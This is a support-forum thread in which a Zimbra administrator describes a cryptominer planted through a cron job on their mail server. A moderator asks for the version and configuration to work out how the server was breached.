Results 1 to 10 of 10

Thread: Zimbra server hacked

Hybrid View

  1. #1
    Join Date
    Jan 2014
    Posts
    5
    Rep Power
    1

    Default Zimbra server hacked

    Hi,
    I have a Zimbra 8.06 installation on a Centos 6 server.
    Yesterday someone has started 3 process on tmp folder with zimbra and has added 2 jobs on crontab.
    Could you help to understand how can I secure the server and how they do that?

    Thank you very much!

  2. #2
    phoenix is offline Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,587
    Rep Power
    58

    Default

    Quote Originally Posted by LeoB View Post
    I have a Zimbra 8.06 installation on a Centos 6 server.
    Yesterday someone has started 3 process on tmp folder with zimbra and has added 2 jobs on crontab.
    Could you help to understand how can I secure the server and how they do that?
    Not really as you've given no details on what they've actually done nor have you provided any details of your configuration (hardware or software) or the current security on your server. You could start by giving details on whether this server is behind a NAT router or directly on the internet or if this is a rootkit that's installed or what you've done to check and remove the offending processes.
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  3. #3
    Join Date
    Jan 2014
    Posts
    5
    Rep Power
    1

    Default

    Thank you Bill for your quick reply..
    It's a virtual machine hosted by an italian provider and it's directly connected on internet with a public ip. It's protected by iptables through a shorewall configuration.. There is installed only zimbra over a Centos 6.3 OS installed with minimal option.
    I found a new entry in the cron of the user zimbra that every 6 hours download and launch a process into /tmp/ folder. I didn't understood what the process do, but scanning it with virustotal, it say it's a bitcoinminer process. I also found in the same folder a cfg file with this entry stratum+tcp://ltc-eu.give-me-coins.com:3333 and a username and a password..
    Until now I just removed the cron entry and I killed the processes and deleted from the tmp folder but I don't know how they add the cron entry.. Is there a log of the web interface to understand if they exploited in some way the web?

    thank you again!

  4. #4
    phoenix is offline Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,587
    Rep Power
    58

    Default

    Are you certain that you have ZCS 8.0.6 installed? Post the output of the following command:

    Code:
    zmcontrol -v
    This vulnerability was fixed in ZCS 8.0.6, are you sure this hak happened recently? Is this the only version of ZCS you've installed and was it a new install or an upgrade?
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  5. #5
    Join Date
    Jan 2014
    Posts
    5
    Rep Power
    1

    Default

    Yes, I'm sure it's a 8.06. This is the output of the command you said:

    Code:
    Release 8.0.6_GA_5922.RHEL6_64_20131203103705 RHEL6_64 FOSS edition
    I also checked the creation date of the files and they are from 24 Jan 23.30 to 25 Jan at 7.56 am..

    Is there a log file where I can see what happened on that time?

  6. #6
    Join Date
    Jan 2014
    Posts
    5
    Rep Power
    1

    Default

    Sorry, I forgot to say it's an upgrade from a 7 version (I don't remember exactly the version) but for sure one of the bugged version

Similar Threads

  1. Zimbra hacked =(
    By krolen in forum Administrators
    Replies: 4
    Last Post: 08-31-2013, 03:34 PM
  2. Getting very hacked off with Zimbra
    By Guest in forum Administrators
    Replies: 15
    Last Post: 10-04-2011, 07:33 PM
  3. Zimbra got hacked?
    By cocas in forum Administrators
    Replies: 4
    Last Post: 11-23-2010, 02:08 PM
  4. Zimbra server got hacked, security?
    By violentpurr in forum Administrators
    Replies: 5
    Last Post: 03-28-2008, 01:04 AM
  5. Replies: 12
    Last Post: 11-05-2007, 02:48 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •